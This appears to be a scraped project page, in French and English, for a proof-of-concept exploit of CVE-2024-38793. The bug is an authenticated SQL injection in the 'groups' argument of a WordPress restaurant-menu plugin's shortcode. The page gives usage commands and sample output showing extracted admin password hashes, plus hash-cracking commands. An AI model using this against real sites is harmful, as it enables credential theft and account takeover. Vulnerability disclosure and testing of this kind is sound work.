
Code de preuve de concept pour l'exploitation de CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - Injection SQL authentifiée (Contributeur+))
Code de preuve de concept pour l'exploitation de CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - Authenticated (Contributor+) SQL Injection).
Ceci est un exploit de preuve de concept pour la vulnérabilité CVE-2024-38793, une vulnérabilité d'injection SQL pour les versions du plugin WordPress Best Restaurant Menu a.k.a Great Restaurant Menu WP antérieures à 1.4.2.
La vulnérabilité survient en raison d'un manque d'assainissement des entrées sur l'argument groups lors de l'utilisation du shortcode brm_restaurant_menu.
Note : Cela nécessite les identifiants d'un utilisateur disposant d'au moins les privilèges de niveau Contributeur.
Le code tentera de récupérer les noms d'utilisateur et les hachages de mots de passe de la table des utilisateurs de WordPress.
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
Requires Contributor+ Privileges on a WordPress instance with the plugin installed
Credit: @ret2desync
Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
Example usage:
python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
usage: CVE-2024-38793.py [-h] -t TARGET -u USERNAME -p PASSWORD [--proxy PROXY] [-o OUTFILE]
python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password
CVE-2024-38793 Exploit (Best Restaurant Menu by PriceListo Version <= 1.4.1) PoC
Requires Contributor+ Privileges on a WordPress instance with the plugin installed
Credit: @ret2desync
Will attempt to create a new post, exploit the vulnerability and extract all users usernames and password hashes
Example usage:
python3 CVE-2024-38793.py -t "http://127.0.0.1/wordpress/" -u contributor -p password --proxy "http://127.0.0.1:8080"
[*] Successfully signed in to Wordpress using contributor password
[*] Successfully created new post, id: 219
[*] Successfully saved new post with exploit, post id: 219
[*] Successfully grabbed usernames and password hashes
[*] Found 2 sets of credentials
[*** Credentials ***]
root:$P$BG.b.gHI.byee9PWs8GspKxY9qp0Cm0
contributor:$P$BBVRINbQUo28Tpbp3H7/iITT/Eo9aR0
[*] Crack hashes with:
john <hashes_file> --wordlist=<wordlist>
hashcat -m 400 -a 0 --username <hashes_file> <wordlist>
[*] Exploit completed successfully